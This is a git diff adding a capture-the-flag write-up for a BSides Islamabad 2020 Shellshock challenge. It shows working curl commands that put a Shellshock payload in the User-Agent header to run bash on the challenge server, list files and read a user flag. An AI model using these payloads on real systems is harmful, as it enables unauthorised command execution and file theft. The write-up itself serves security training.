diff --git a/BsidesIslamabad 2020/Shellshock.md b/BsidesIslamabad 2020/Shellshock.md new file mode 100644 index 0000000..cc7039e --- /dev/null +++ b/BsidesIslamabad 2020/Shellshock.md @@ -0,0 +1,49 @@ + + +Looking at the source code we find base64 encoded text + +``` +Like the way you think spidey Y2dpLWJpbi90ZXN0LnNo +``` + +On decoding + + + +I did a `nikto` scan and found that this is vulnerable to `shellshock` + + +I search on google about `cgi-bin` and found that they are mostly vulnerable to `shellshock` that allows execution of bash commands +On refering to this blog post + + +`https://wywyit.medium.com/ritsec-fall-2018-ctf-week-6-45d414035c76` + + +I used + +``` +curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'find / -type "*.txt"'" http://challenges.ctfd.io:30328/cgi-bin/test.sh +``` + +And it gave me a bunch of files + + + +At the bottom I found + +``` +/usr/lib/python3.8/LICENSE.txt +/tmp/bash-4.3/doc/article.txt +/tmp/bash-4.3/doc/fdl.txt +/tmp/bash-4.3/examples/INDEX.txt +/home/admin/root.txt +/home/herman/user.txt +``` + +``` +Bsides Islamabad# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /home/herman/user.txt'" http://challenges.ctfd.io:30328/cgi-bin/test.sh + +Bsides-PK-Fl4g{sinister_six} +``` +And that was our flag !